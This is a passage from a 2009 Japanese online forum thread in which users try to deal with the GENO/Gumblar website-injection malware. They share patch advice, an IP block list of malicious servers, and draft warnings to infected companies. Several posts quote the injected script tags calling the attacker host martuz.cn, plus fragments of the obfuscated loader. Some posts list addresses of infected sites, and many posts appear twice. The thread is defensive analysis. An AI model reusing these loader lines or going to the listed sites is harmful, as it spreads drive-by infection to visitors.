さっさとHP直しやがれ誠意ってなんですかねぃおおぅ?!
146 :192.168.0.774:2009/05/17(日) 13:48:45 ID:mJUiMCyk0
replica08■web■fc2■com/index■html
感染
感染
147 :192.168.0.774:2009/05/17(日) 13:49:06 ID:+iVGXmeP0
・Adobe Flash Playerを更新
バージョンの確認 最新:10.0.22.87
ttp://www.adobe.com/jp/software/flash/about/
ダウンロード
ttp://get.adobe.com/jp/flashplayer/
・(入れてる人は)Adobe Readerを9.1.1に更新し、Javascriptの実行を制限する
ダウンロード 9.1
ttp://get.adobe.com/jp/reader/
ダウンロード後、[ヘルプ]→[アップデートの有無をチェック]することで9.1.1にし、
[編集]→[環境設定]→<JavaScript>→<Acrobat JavaScriptを使用>のチェックを外し、[OK]
(´・ω・`)らんらん♪
バージョンの確認 最新:10.0.22.87
ttp://www.adobe.com/jp/software/flash/about/
ダウンロード
ttp://get.adobe.com/jp/flashplayer/
・(入れてる人は)Adobe Readerを9.1.1に更新し、Javascriptの実行を制限する
ダウンロード 9.1
ttp://get.adobe.com/jp/reader/
ダウンロード後、[ヘルプ]→[アップデートの有無をチェック]することで9.1.1にし、
[編集]→[環境設定]→<JavaScript>→<Acrobat JavaScriptを使用>のチェックを外し、[OK]
(´・ω・`)らんらん♪
148 :192.168.0.774:2009/05/17(日) 13:49:47 ID:T9pTie3x0
感染ってどうやって見つけてるの?
149 :192.168.0.774:2009/05/17(日) 13:51:26 ID:yMbOeyMJ0
>>147
(´・ω・`)らん豚帰れよ
(´・ω・`)らん豚帰れよ
150 :192.168.0.774:2009/05/17(日) 13:54:23 ID:RrqXiVyA0
avastとバスター2009の同居ってやっぱだめ?
151 :192.168.0.774:2009/05/17(日) 13:55:57 ID:iagHZf1s0
すまん、流れ読まずに投下
gnome氏のzlkon/gumblarサイトを参考に作ったんで防止策の一つとして貼っておく
・サーバがちょくちょく変わる性質なので今後の動向に注意
・一番上のmartuz.cnはNEW
・行頭の"HiPr-"はgnome氏が緊急(High Priority)と書いてるもの
・言うまでもないが、IP範囲最終決定とか使用は自己責任で
HiPr-NEW martuz.cn - 2009.05.16 (95.129.144.0/23) :95.129.144.0-95.129.145.255
HiPr- Botnet C&C by Gumblar - 2009.05.09 (78.109.16.0/20) :78.109.16.0-78.109.31.255
HiPr- gumblar relative 2009.05.07 (213.182.192.0/19) :213.182.192.0-213.182.223.255
HiPr- gumblar - 2009.05.02 (94.229.64.0/20) :94.229.64.0-94.229.79.255
Trojan Exploits (Regarding ZeuS) -- 2009.05.14 (206.44.0.0/16) :206.44.0.0-206.44.255.255
Malware Injection 2009.05.06 (91.211.64.0/23) :91.211.64.0-91.211.65.255
basesrv3.net - 2009.05.03 (91.212.41.0/24) :91.212.41.0-91.212.41.255
Malware Injection 2009.05.06 (91.212.65.0/24) :91.212.65.0-91.212.65.255
Trojan Exploits (Regarding ZeuS) -- 2009.05.14 (85.17.0.0/16) :85.17.0.0-85.17.255.255
autobestwestern.cn - 2009.05.13 (85.214.90.0/24) :85.214.90.0-85.214.90.255
gumblar via e-mail - 2009.05.12 (74.220.215.0/24) :74.220.215.0-74.220.215.255
zlkon another-type 2009.05.03 (212.117.160.0/19) :212.117.160.0-212.117.191.255
zlkon.lv -- 2009.04.05 (94.247.2.0/23) :94.247.2.0-94.247.3.255
gnome氏のzlkon/gumblarサイトを参考に作ったんで防止策の一つとして貼っておく
・サーバがちょくちょく変わる性質なので今後の動向に注意
・一番上のmartuz.cnはNEW
・行頭の"HiPr-"はgnome氏が緊急(High Priority)と書いてるもの
・言うまでもないが、IP範囲最終決定とか使用は自己責任で
HiPr-NEW martuz.cn - 2009.05.16 (95.129.144.0/23) :95.129.144.0-95.129.145.255
HiPr- Botnet C&C by Gumblar - 2009.05.09 (78.109.16.0/20) :78.109.16.0-78.109.31.255
HiPr- gumblar relative 2009.05.07 (213.182.192.0/19) :213.182.192.0-213.182.223.255
HiPr- gumblar - 2009.05.02 (94.229.64.0/20) :94.229.64.0-94.229.79.255
Trojan Exploits (Regarding ZeuS) -- 2009.05.14 (206.44.0.0/16) :206.44.0.0-206.44.255.255
Malware Injection 2009.05.06 (91.211.64.0/23) :91.211.64.0-91.211.65.255
basesrv3.net - 2009.05.03 (91.212.41.0/24) :91.212.41.0-91.212.41.255
Malware Injection 2009.05.06 (91.212.65.0/24) :91.212.65.0-91.212.65.255
Trojan Exploits (Regarding ZeuS) -- 2009.05.14 (85.17.0.0/16) :85.17.0.0-85.17.255.255
autobestwestern.cn - 2009.05.13 (85.214.90.0/24) :85.214.90.0-85.214.90.255
gumblar via e-mail - 2009.05.12 (74.220.215.0/24) :74.220.215.0-74.220.215.255
zlkon another-type 2009.05.03 (212.117.160.0/19) :212.117.160.0-212.117.191.255
zlkon.lv -- 2009.04.05 (94.247.2.0/23) :94.247.2.0-94.247.3.255
152 :192.168.0.774:2009/05/17(日) 13:57:46 ID:77O8s7yk0
一般に、機能の衝突するセキュリティソフトを複数導入するのは推奨されない。
153 :192.168.0.774:2009/05/17(日) 13:58:36 ID:RrqXiVyA0
154 :192.168.0.774:2009/05/17(日) 14:00:18 ID:0CtfCDPI0
成美堂出版 → martuz.cn
<script src=//mar"+"tuz.cn/vid/?id="+j+"><\/script>
replica08■web■fc2■com → martuz.cn
<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>
意外と飛び先は少ないのかもしれん リストが無いならつくるかねぇ
<script src=//mar"+"tuz.cn/vid/?id="+j+"><\/script>
replica08■web■fc2■com → martuz.cn
<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>
意外と飛び先は少ないのかもしれん リストが無いならつくるかねぇ
155 :192.168.0.774:2009/05/17(日) 14:00:38 ID:2KRNOGSH0
俺スパマーになれんのか?あっはは。
>>146のIP 208.71.106.38
>>147
Adobe Readerってバージョン違いで共存できたっけ?
テンプレ的には Ver1〜Ver8とか使っている人は削除して ってのを途中に入れたほうがいいかもしれない。
しかし、IPA↓ 110番を語るには休みすぎ。
コンピュータウイルスの相談窓口としてコンピュータウイルス110番の電話を設けております。
届出の方法等、コンピュータウイルスに関連のあることは何でもご相談下さい。
受付時間:平日10:00〜12:00、13:30〜17:00
>>151
参考にさせてもらいます。
>>146のIP 208.71.106.38
>>147
Adobe Readerってバージョン違いで共存できたっけ?
テンプレ的には Ver1〜Ver8とか使っている人は削除して ってのを途中に入れたほうがいいかもしれない。
しかし、IPA↓ 110番を語るには休みすぎ。
コンピュータウイルスの相談窓口としてコンピュータウイルス110番の電話を設けております。
届出の方法等、コンピュータウイルスに関連のあることは何でもご相談下さい。
受付時間:平日10:00〜12:00、13:30〜17:00
>>151
参考にさせてもらいます。
156 :192.168.0.774:2009/05/17(日) 14:04:21 ID:1tk6kEt+0
>>93
Avast!をすり抜けるサイト教えてくださいませ。見つけられない。
Avast!をすり抜けるサイト教えてくださいませ。見つけられない。
157 :192.168.0.774:2009/05/17(日) 14:05:24 ID:LQE1Ao+t0
「5.危険IPのブロック」の方法がわからないのですが、教えてくれませんか?
158 :192.168.0.774:2009/05/17(日) 14:08:44 ID:1tk6kEt+0
159 :192.168.0.774:2009/05/17(日) 14:09:06 ID:TTgW4pHv0
160 :192.168.0.774:2009/05/17(日) 14:09:07 ID:77O8s7yk0
161 :192.168.0.774:2009/05/17(日) 14:10:30 ID:T9pTie3x0
162 :192.168.0.774:2009/05/17(日) 14:13:51 ID:LQE1Ao+t0
163 :192.168.0.774:2009/05/17(日) 14:18:21 ID:G0FsAaa+0
御社のHPがウィルスに感染し、改竄されております。
改竄により御社ホームページを閲覧した一般のお客様まで次々と感染してしまう状態となっており、
現在御社が意図せぬ加害者となってしまっております。
被害を拡大を最小限に抑えるためにも、早急なご対応をお願い致します。
以下このウィルスについての説明を添えさせていただきます。
---
こんな感じで以下>>109路線の文章を貼り付けるのはどうだろう
読んで理解できる人がメールを受け取れば読むだろうが、理解できない人が見たときでも緊急性が伝わるように簡潔な前置きをおくべきかと
だが>>120路線だとセキュリティソフトの売りつけやサービスの営業スパムに見える気がする
・HPが改竄されている
・意図せぬ加害者となっている
・早急な対応を!
ということだけは伝える必要があるよな
これだきちんと伝われば理解できる人にパスされるだろうし、理解できる人がメールを受け取ったら自分でちゃんと読むだろう。
改竄により御社ホームページを閲覧した一般のお客様まで次々と感染してしまう状態となっており、
現在御社が意図せぬ加害者となってしまっております。
被害を拡大を最小限に抑えるためにも、早急なご対応をお願い致します。
以下このウィルスについての説明を添えさせていただきます。
---
こんな感じで以下>>109路線の文章を貼り付けるのはどうだろう
読んで理解できる人がメールを受け取れば読むだろうが、理解できない人が見たときでも緊急性が伝わるように簡潔な前置きをおくべきかと
だが>>120路線だとセキュリティソフトの売りつけやサービスの営業スパムに見える気がする
・HPが改竄されている
・意図せぬ加害者となっている
・早急な対応を!
ということだけは伝える必要があるよな
これだきちんと伝われば理解できる人にパスされるだろうし、理解できる人がメールを受け取ったら自分でちゃんと読むだろう。
164 :192.168.0.774:2009/05/17(日) 14:20:24 ID:77O8s7yk0
どうせ休日明けまで対処はないし、出社したら状況は把握するだろ。
一行だけですけど95.129.144.0-95.129.145.255
追加しておきました。教えて君が増えるのでパス付けました。
パスは zlkonの2009/04/27(月)時点の○○○○○個数
住人ならわかるはず、CIDRはありません・・・変換マンドクセ
ttp://www.rupan.net/uploader/download/1242537519.txt
追加しておきました。教えて君が増えるのでパス付けました。
パスは zlkonの2009/04/27(月)時点の○○○○○個数
住人ならわかるはず、CIDRはありません・・・変換マンドクセ
ttp://www.rupan.net/uploader/download/1242537519.txt
166 :192.168.0.774:2009/05/17(日) 14:24:30 ID:ilxyL7Fy0
>>156
TOPページは引っ掛かったが、リンクされている他のページの幾つかがVirusTotalではスルーになってました。
実際にAvastでアクセスしたのではなく、ダウンローダで感染サイトのTOPページのhtmlを取得。
エディタで開いてリンク先を片っ端からダウンローダで取得。拾ったうちの幾つかは、Avastスルー。
(8〜9割は検知してましたが、昨日拾った検体の中での話)
Avastに提出済みなので、近いうちには対応されるかと思いますが、難読化されたスクリプトには
複数のバリエーションがあるので、今後もすり抜けるケースも存在すると思いますから、
○○(今回はAvast)入れておけば大丈夫といった表現は避けた方がいいと思います。
TOPページは引っ掛かったが、リンクされている他のページの幾つかがVirusTotalではスルーになってました。
実際にAvastでアクセスしたのではなく、ダウンローダで感染サイトのTOPページのhtmlを取得。
エディタで開いてリンク先を片っ端からダウンローダで取得。拾ったうちの幾つかは、Avastスルー。
(8〜9割は検知してましたが、昨日拾った検体の中での話)
Avastに提出済みなので、近いうちには対応されるかと思いますが、難読化されたスクリプトには
複数のバリエーションがあるので、今後もすり抜けるケースも存在すると思いますから、
○○(今回はAvast)入れておけば大丈夫といった表現は避けた方がいいと思います。
167 :192.168.0.774:2009/05/17(日) 14:26:27 ID:2KRNOGSH0
>>163
それでいいと思う。
これまでにも
「サイトを閲覧していたユーザーからの連絡があったため調査し見ると〜に感染していると判明した」ってのは多い。
十分に内容は伝わっていると思うから、早速出した方が良いと思う。
それでいいと思う。
これまでにも
「サイトを閲覧していたユーザーからの連絡があったため調査し見ると〜に感染していると判明した」ってのは多い。
十分に内容は伝わっていると思うから、早速出した方が良いと思う。
168 :192.168.0.774:2009/05/17(日) 14:29:35 ID:2KRNOGSH0
あっちのスレが終わりそうだが、こっちに来る気か?
169 :192.168.0.774:2009/05/17(日) 14:30:17 ID:1tk6kEt+0
>>162
Avast!にはファイヤーウォール機能がないから、ファイヤーウォールアプリを
入れてブロックするIPを設定するか、ルータのIPフィルタリング機能を使う。
ルータの場合、
http://www.aterm.jp/function/guide4/high/saver/wd/9s_m7bb.html#ip0
を参考に。
Avast!にはファイヤーウォール機能がないから、ファイヤーウォールアプリを
入れてブロックするIPを設定するか、ルータのIPフィルタリング機能を使う。
ルータの場合、
http://www.aterm.jp/function/guide4/high/saver/wd/9s_m7bb.html#ip0
を参考に。
170 :192.168.0.774:2009/05/17(日) 14:30:29 ID:VGi2lcCh0
>1
乱立すんな死ね!!!!!!!!!!!!!!!!!!!
本スレはこっちな
GENOウイルススレ ★11
http://pc11.2ch.net/test/read.cgi/sec/1242538005/
乱立すんな死ね!!!!!!!!!!!!!!!!!!!
本スレはこっちな
GENOウイルススレ ★11
http://pc11.2ch.net/test/read.cgi/sec/1242538005/
172 :192.168.0.774:2009/05/17(日) 14:34:02 ID:VCQZY8+a0
お前ら落ち着け!今は争ってる場合じゃない!
173 :192.168.0.774:2009/05/17(日) 14:34:27 ID:ov4CW62y0
174 :192.168.0.774:2009/05/17(日) 14:34:39 ID:Sggs+C2i0 BE:508226292-S★(636363)
175 :192.168.0.774:2009/05/17(日) 14:35:26 ID:Sggs+C2i0 BE:451757344-S★(636363)
>>174
すみません失礼しました。誤爆しました。
すみません失礼しました。誤爆しました。
176 :192.168.0.774:2009/05/17(日) 14:35:36 ID:ilxyL7Fy0
Avast常駐中に「JS:Redirector-H 〜 JS:Redirector-H9」か、類似の名称で検知した場合は
zlkon.lv/gumlar.cn/martuz.cn からマルウェアを落とそうとするページである可能性が高い…程度の表現かなぁ。
JS:Redirector-H(無印),JS:Redirector-H2,JS:Redirector-H4,JS:Redirector-H7,JS:Redirector-H9は
手元の検体で確認済み。
zlkon.lv/gumlar.cn/martuz.cn からマルウェアを落とそうとするページである可能性が高い…程度の表現かなぁ。
JS:Redirector-H(無印),JS:Redirector-H2,JS:Redirector-H4,JS:Redirector-H7,JS:Redirector-H9は
手元の検体で確認済み。
177 :192.168.0.774:2009/05/17(日) 14:35:36 ID:Ts61gYp70
お前意地張ってないで
本スレ見た方がいいぞ
今あっちでは双葉ちゃんねるが感染したって騒ぎになってるから
178 :192.168.0.774:2009/05/17(日) 14:35:40 ID:LQE1Ao+t0
>>169 おおどうもです。そんなサイト探してました。とりあえずルーター設定でやってみます。
179 :192.168.0.774:2009/05/17(日) 14:36:01 ID:1l1Ze1DVP
どこが本スレだよ
教えやがれ奴隷ども
教えやがれ奴隷ども
180 :192.168.0.774:2009/05/17(日) 14:36:07 ID:1tk6kEt+0
181 :192.168.0.774:2009/05/17(日) 14:36:34 ID:ov4CW62y0
>>173
ごめん、1行目コピペ忘れてたは
ごめん、1行目コピペ忘れてたは
182 :192.168.0.774:2009/05/17(日) 14:37:31 ID:zd6xXlce0
183 :192.168.0.774:2009/05/17(日) 14:37:46 ID:VCQZY8+a0
取り敢えずうちのPCは感染していない事が判ったので
俺はバスターの対応を待つ
それまでPCではここと2ちゃんしかみない
ミクシィも携帯のみにするわ
俺はバスターの対応を待つ
それまでPCではここと2ちゃんしかみない
ミクシィも携帯のみにするわ
184 :192.168.0.774:2009/05/17(日) 14:41:08 ID:LQE1Ao+t0
[セキュリティ版]GENOウイルススレ ★10でID表示される掲示板が良いと言う事になって、
こっちにスレが立つことになりました。★11は立てないはずだった様ですけど。
こっちにスレが立つことになりました。★11は立てないはずだった様ですけど。
185 :192.168.0.774:2009/05/17(日) 14:41:19 ID:YGxJUpFP0
すみません少しテンパってます、知恵を貸してください
スレチなら誘導して頂けると幸いです
普段ブラウザはもっぱら火狐だがこの機会にIEも最新のにしておくかと8を用意
↓
インスコ失敗しましたので再起動推奨しますよ!にホイホイ釣られてうっかり再起動
↓
何故か青くはならなかったけどデスクトップ壁紙のみ/(^o^)\
↓
辛うじて記憶していたショートカットでタスクマネージャ起動
↓
新しいタスクの実行から専ブラ起動←今ココ
テンプレの症状で確認できていたのは以下のみ
@cmd.exe、regedit.exeが起動しない
Asqlsodbc.chmのファイルサイズがおかしい
CPU使用率は常と変わらず、使っているのはWinXPSP3 2GBです
リカバリするにも何処から仕掛けて良いのやらorz
スレチなら誘導して頂けると幸いです
普段ブラウザはもっぱら火狐だがこの機会にIEも最新のにしておくかと8を用意
↓
インスコ失敗しましたので再起動推奨しますよ!にホイホイ釣られてうっかり再起動
↓
何故か青くはならなかったけどデスクトップ壁紙のみ/(^o^)\
↓
辛うじて記憶していたショートカットでタスクマネージャ起動
↓
新しいタスクの実行から専ブラ起動←今ココ
テンプレの症状で確認できていたのは以下のみ
@cmd.exe、regedit.exeが起動しない
Asqlsodbc.chmのファイルサイズがおかしい
CPU使用率は常と変わらず、使っているのはWinXPSP3 2GBです
リカバリするにも何処から仕掛けて良いのやらorz
186 :192.168.0.774:2009/05/17(日) 14:41:40 ID:ilxyL7Fy0
>>156
あったあった。
昨日検体提出時点(0/40)
ttp://www.virustotal.com/analisis/b778a4887a5d5c84ef2fedf2b33d9880
今、再確認したけど、やっぱりスルー(0/40)
ttp://www.virustotal.com/analisis/5935f35c8d6e05beea7789d312329ff1
アドレスはこれかな
sound■jp/yudai_marimba/
他にも2つ位、Avastスルーだけどしっかりスクリプトが挿入されているページがありました。
1つ出てきたから、あとはもういいか。
昨日の時点で入っていたもの。
|<script language=javascript><!--
|(function(ljk8K){var q0UFt='%';var ikN7=('va_72_20a_3d_<以下略>
| --></script>
あったあった。
昨日検体提出時点(0/40)
ttp://www.virustotal.com/analisis/b778a4887a5d5c84ef2fedf2b33d9880
今、再確認したけど、やっぱりスルー(0/40)
ttp://www.virustotal.com/analisis/5935f35c8d6e05beea7789d312329ff1
アドレスはこれかな
sound■jp/yudai_marimba/
他にも2つ位、Avastスルーだけどしっかりスクリプトが挿入されているページがありました。
1つ出てきたから、あとはもういいか。
昨日の時点で入っていたもの。
|<script language=javascript><!--
|(function(ljk8K){var q0UFt='%';var ikN7=('va_72_20a_3d_<以下略>
| --></script>
187 :192.168.0.774:2009/05/17(日) 14:42:16 ID:VPbnNWIB0
>>185
感染確定
感染確定
188 :192.168.0.774:2009/05/17(日) 14:44:04 ID:weq4pQS+0
スレを見てたらブラウザがウイルスに感染した、みたいなの出てきたがこれは違うやつか
189 :192.168.0.774:2009/05/17(日) 14:44:33 ID:um/XFnMU0
190 :192.168.0.774:2009/05/17(日) 14:46:16 ID:q8u6cZFi0
191 :192.168.0.774:2009/05/17(日) 14:47:07 ID:MpyKmePW0
192 :192.168.0.774:2009/05/17(日) 14:47:55 ID:weq4pQS+0
あんまり興味なかったからノートンでもavastでもなくてAVGなんだが
193 :192.168.0.774:2009/05/17(日) 14:48:20 ID:NFeyfEj00
Adobe ReaderとFlash Playerを最新のにしたんですが
Javascriptとかはよく分からないので放置してます。
とりあえず最新版使ってればセキュリティーホール突かれることもなく
安全なんですよね?
Javascriptとかはよく分からないので放置してます。
とりあえず最新版使ってればセキュリティーホール突かれることもなく
安全なんですよね?
194 :192.168.0.774:2009/05/17(日) 14:49:33 ID:um/XFnMU0
今はね
195 :192.168.0.774:2009/05/17(日) 14:49:42 ID:1tk6kEt+0
196 :192.168.0.774:2009/05/17(日) 14:50:55 ID:YpVuMiqJ0
avastからAviraAntivirに乗り換えた途端にavastが本気出してきて乗り換えたくなってきたぜ
197 :192.168.0.774:2009/05/17(日) 14:51:32 ID:77O8s7yk0
>>193
まあそれでOK。他のソフトも含めて、今後もアップデート情報はチェックしとこう。
まあそれでOK。他のソフトも含めて、今後もアップデート情報はチェックしとこう。
198 :192.168.0.774:2009/05/17(日) 14:53:04 ID:Um/4qeYR0
このサイト見たらアヴァストが反応するんだけどどうなの?
反応したってことは大丈夫なんだろうけど・・・
一応閲覧注意な
HTTP;//pmpk.dojin.com/
反応したってことは大丈夫なんだろうけど・・・
一応閲覧注意な
HTTP;//pmpk.dojin.com/
199 :192.168.0.774:2009/05/17(日) 14:53:06 ID:z5ZKMxe60
hxxp://www.ukokkei.co.jp/company/index.html
だが、
会社概要の
株式会社烏骨鶏
〒920-0024 石川県金沢市西念4丁目21番18号
TEL 076-232-4255
FAX 076-233-0405
Mail [email protected]
じゃだめなん?
だが、
会社概要の
株式会社烏骨鶏
〒920-0024 石川県金沢市西念4丁目21番18号
TEL 076-232-4255
FAX 076-233-0405
Mail [email protected]
じゃだめなん?
200 :192.168.0.774:2009/05/17(日) 14:53:27 ID:7Fj5Ju7c0
>>186
F-Secureユーザですが、F-Secureへ検体提供したほうがいいですか?
F-Secureユーザですが、F-Secureへ検体提供したほうがいいですか?
201 :192.168.0.774:2009/05/17(日) 14:54:44 ID:7TaPV4fL0
急に流れが速くなったな
202 :192.168.0.774:2009/05/17(日) 14:54:47 ID:buHp3trp0
セキュリティソフトの会社って自作自演とかしてるの?
自分でウイルス作ってばらまいて他社より早く定義更新してユーザーに賞賛されるとかさ
自分でウイルス作ってばらまいて他社より早く定義更新してユーザーに賞賛されるとかさ
203 :192.168.0.774:2009/05/17(日) 14:55:02 ID:OUF99NvG0
Adobe Reader9.1.1公開日が5/13
今回GENOウイルスがターゲットにした脆弱性は
このバージョンから対策OKなのか3/11の9.1.0で対策OKだったのかどっちかな?
今回GENOウイルスがターゲットにした脆弱性は
このバージョンから対策OKなのか3/11の9.1.0で対策OKだったのかどっちかな?
204 :192.168.0.774:2009/05/17(日) 14:55:15 ID:YGxJUpFP0
>>185です
本気でデスクトップが壁紙だけで寂しいです
アイコンもバーも無い・・・
CDとか用意した記憶がないのですがそれでもリカバリは可能でしょうか?
グーグル先生に聞いても「まずCDを作成します」から始まる絶望感
本気でデスクトップが壁紙だけで寂しいです
アイコンもバーも無い・・・
CDとか用意した記憶がないのですがそれでもリカバリは可能でしょうか?
グーグル先生に聞いても「まずCDを作成します」から始まる絶望感
205 :192.168.0.774:2009/05/17(日) 14:55:24 ID:t97Zp0ei0
>>202
お前頭いいな
お前頭いいな
206 :192.168.0.774:2009/05/17(日) 14:57:32 ID:VPbnNWIB0
>>204
機種名ぐらいかけ
機種名ぐらいかけ
207 :192.168.0.774:2009/05/17(日) 14:58:26 ID:ov4CW62y0
>>203
Flash Playerは10.0.22.87と9.0.159.0が脆弱性を修正したver
Adobe Readerは7.1.1と8.1.4と9.1.0が脆弱性を修正したver
以降は別物の脆弱性ver
Flash Playerは10.0.22.87と9.0.159.0が脆弱性を修正したver
Adobe Readerは7.1.1と8.1.4と9.1.0が脆弱性を修正したver
以降は別物の脆弱性ver
208 :192.168.0.774:2009/05/17(日) 14:58:50 ID:MpyKmePW0
209 :192.168.0.774:2009/05/17(日) 14:59:32 ID:ilxyL7Fy0
>>200
提出済みです。
提出済みです。
210 :192.168.0.774:2009/05/17(日) 14:59:44 ID:YpVuMiqJ0
>>202
それは結構前から言われてる事、本当かどうかは知らん
それは結構前から言われてる事、本当かどうかは知らん
211 :192.168.0.774:2009/05/17(日) 15:00:06 ID:6zykGUMd0
>>198
gumblar.cn の現在のステータス
疑わしいサイトとして認識されています。
このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
12799 個のドメインを感染させています。
(function(){var IlkQ='%';var xTy7='var>20a>3d>22Sc>72iptE>
6egine>22>2cb>3d>22V>65rsion()+>22>2cj>3d・・・・・・
gumblar.cn の現在のステータス
疑わしいサイトとして認識されています。
このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
12799 個のドメインを感染させています。
(function(){var IlkQ='%';var xTy7='var>20a>3d>22Sc>72iptE>
6egine>22>2cb>3d>22V>65rsion()+>22>2cj>3d・・・・・・
212 :192.168.0.774:2009/05/17(日) 15:01:05 ID:ybsV4IQS0
ファイアフォックス使ってんだけど
弾いてくれたから大丈夫って感じなの?
弾いてくれたから大丈夫って感じなの?
213 :192.168.0.774:2009/05/17(日) 15:01:34 ID:Z6bHwWLb0
>>193と同じく、Adobe ReaderとFlash Playerを最新にして
Adobe ReaderのJavascriptは切っておいた。
あと今プニル使ってるので
念のためプニルの設定とIEのインターネットオプションの両方で
Javascript無効にしてる。
ただ、IEのJavascriptは実際のところどうなんだろう。
2ch専ブラにまで影響出るので、正直言うと情報収集に少々厄介なんだが。
Adobe ReaderのJavascriptは切っておいた。
あと今プニル使ってるので
念のためプニルの設定とIEのインターネットオプションの両方で
Javascript無効にしてる。
ただ、IEのJavascriptは実際のところどうなんだろう。
2ch専ブラにまで影響出るので、正直言うと情報収集に少々厄介なんだが。
214 :192.168.0.774:2009/05/17(日) 15:01:45 ID:7TaPV4fL0
そういや、3週間前にFirefoxやJane Styleのログが
PCシャットダウン→起動後に全飛びしたけど、
このウイルスとは関係ないよね。
PCシャットダウン→起動後に全飛びしたけど、
このウイルスとは関係ないよね。
215 :192.168.0.774:2009/05/17(日) 15:02:35 ID:QQBuyEr/0
ブラウザのJavascriptを切るってどうやればいいの?
216 :192.168.0.774:2009/05/17(日) 15:02:39 ID:DKlwM8ZhP
>>207
以前じゃなくて以降なのか?
以前じゃなくて以降なのか?
217 :192.168.0.774:2009/05/17(日) 15:02:47 ID:7TaPV4fL0
テンプレに書かれている症状は一切ないし、大丈夫だと思いたい。
218 :192.168.0.774:2009/05/17(日) 15:03:21 ID:ov4CW62y0
>>216
ごめん、以降は別の脆弱性修正ver
ごめん、以降は別の脆弱性修正ver
219 :192.168.0.774:2009/05/17(日) 15:04:09 ID:ilxyL7Fy0
検出可否スレより最新情報を転記
最新の落とされてくる本体ファイルの検出結果。こんな状況なので、セキュリティベンダーの対応を待って
除去してもらおうとか考えるよりも、感染が疑われる(HPを更新したPCとか、踏んじゃった人とか)は
PCリカバリ(OS再インストール)以外の解決策は推奨できないようです。
martuz_cn_id2_20090517.pdf
MD5 :3cdbaee0c533809e43c6b815884763ff
http://www.virustotal.com/jp/analisis/d0f152cbbb8243f084d05485a3d7c3a6 (2/40)
martuz_cn_id10_20090517.exe
MD5 :b0ca69853b371ec9eb58829e869f6f10
http://www.virustotal.com/jp/analisis/7e25c8d2c3766206c20482234449894d (3/40)
最新の落とされてくる本体ファイルの検出結果。こんな状況なので、セキュリティベンダーの対応を待って
除去してもらおうとか考えるよりも、感染が疑われる(HPを更新したPCとか、踏んじゃった人とか)は
PCリカバリ(OS再インストール)以外の解決策は推奨できないようです。
martuz_cn_id2_20090517.pdf
MD5 :3cdbaee0c533809e43c6b815884763ff
http://www.virustotal.com/jp/analisis/d0f152cbbb8243f084d05485a3d7c3a6 (2/40)
martuz_cn_id10_20090517.exe
MD5 :b0ca69853b371ec9eb58829e869f6f10
http://www.virustotal.com/jp/analisis/7e25c8d2c3766206c20482234449894d (3/40)
220 :192.168.0.774:2009/05/17(日) 15:06:25 ID:2kKhzap+0
>>218
もちつけ
もちつけ
221 :192.168.0.774:2009/05/17(日) 15:06:50 ID:HpOylDYR0
USBメモリでも感染る?
222 :192.168.0.774:2009/05/17(日) 15:07:36 ID:OUF99NvG0
223 :192.168.0.774:2009/05/17(日) 15:07:41 ID:DKlwM8ZhP
224 :212:2009/05/17(日) 15:07:54 ID:ybsV4IQS0
ちょwww誰か教えてくださいwww
このままじゃトイレにもいけねぇ
このままじゃトイレにもいけねぇ
225 :192.168.0.774:2009/05/17(日) 15:09:26 ID:+t63J1Bn0
本スレ見てきたんだが、なんかもうGENO付きURL配布とかしてるし
感染は拡大する一方だな
俺なりにまとめてみた
http://geocities.com/gerardopearson50/kristy-shelton.html
追加あったら気軽に書いてくれ
感染は拡大する一方だな
俺なりにまとめてみた
http://geocities.com/gerardopearson50/kristy-shelton.html
追加あったら気軽に書いてくれ
226 :192.168.0.774:2009/05/17(日) 15:10:34 ID:7yrlZLjk0
>>224
かけちゃえかけちゃえ
かけちゃえかけちゃえ
227 :192.168.0.774:2009/05/17(日) 15:10:37 ID:yV8RyIy+0
>>185
ubuntsかなにかのLive CDは用意できないのか?
感染状態でexplorer起動しても、右クリックのコンテキストメニューが
使えないはずだからPC単体ではもはや復帰できないと思う。
あるいはもう一台HDDがあれば、感染したHDDを抜いて、別HDDに
OSをインストールすれば復旧の方法はある
ubuntsかなにかのLive CDは用意できないのか?
感染状態でexplorer起動しても、右クリックのコンテキストメニューが
使えないはずだからPC単体ではもはや復帰できないと思う。
あるいはもう一台HDDがあれば、感染したHDDを抜いて、別HDDに
OSをインストールすれば復旧の方法はある
228 :192.168.0.774:2009/05/17(日) 15:10:57 ID:xLw+W3X80
>>219
検出できるベンダーもバラバラだしウイルスの詳細知らずに結果だけ見たら誤検出?ってレベルじゃないか・・・
検出できるベンダーもバラバラだしウイルスの詳細知らずに結果だけ見たら誤検出?ってレベルじゃないか・・・
229 :192.168.0.774:2009/05/17(日) 15:11:55 ID:BvZF1aRY0
最新版に更新しても新種が出るかもしれないから安心できないお……
だからadobe削除したお!
だからadobe削除したお!
230 :192.168.0.774:2009/05/17(日) 15:12:17 ID:NtSEuLT8Q
感染サイトのURL貼ってる奴、マジで氏ねよ。
231 :212:2009/05/17(日) 15:12:25 ID:ybsV4IQS0
┃
┃ ____
┃/⌒ ⌒ \
┃ (―) (―) \
┃⌒(__人__)⌒ |
┃ |
┃ /
┃ヽ  ̄/
┃ \ ,;∴~;゚,。
┃ ヽ_)つ'∴・゚゚。∴.;
┃ (::)(::) ヽ ~;゚
┃ / 〉 ) >>226
┃ (___)
┃ ____
┃/⌒ ⌒ \
┃ (―) (―) \
┃⌒(__人__)⌒ |
┃ |
┃ /
┃ヽ  ̄/
┃ \ ,;∴~;゚,。
┃ ヽ_)つ'∴・゚゚。∴.;
┃ (::)(::) ヽ ~;゚
┃ / 〉 ) >>226
┃ (___)
233 :192.168.0.774:2009/05/17(日) 15:17:56 ID:6zykGUMd0
234 :192.168.0.774:2009/05/17(日) 15:19:02 ID:BSZ5z9KU0
Adobe Readerは9.1.1が最新型じゃないの?
235 :192.168.0.774:2009/05/17(日) 15:19:05 ID:+Enx2Z7OP
クリーンインストールって面倒なん?
236 :192.168.0.774:2009/05/17(日) 15:22:35 ID:zPBL8LWuO
237 :192.168.0.774:2009/05/17(日) 15:22:38 ID:2KRNOGSH0
>>225
良く分からないけど、それ、誰でも書き込みできるようになってんの?
なってるなら、感染サイトへのリンク張るヤツ出てくるから、
他のヤツに権限を与えない方がよいよ。
そのあたりは大丈夫だと思うけど。
良く分からないけど、それ、誰でも書き込みできるようになってんの?
なってるなら、感染サイトへのリンク張るヤツ出てくるから、
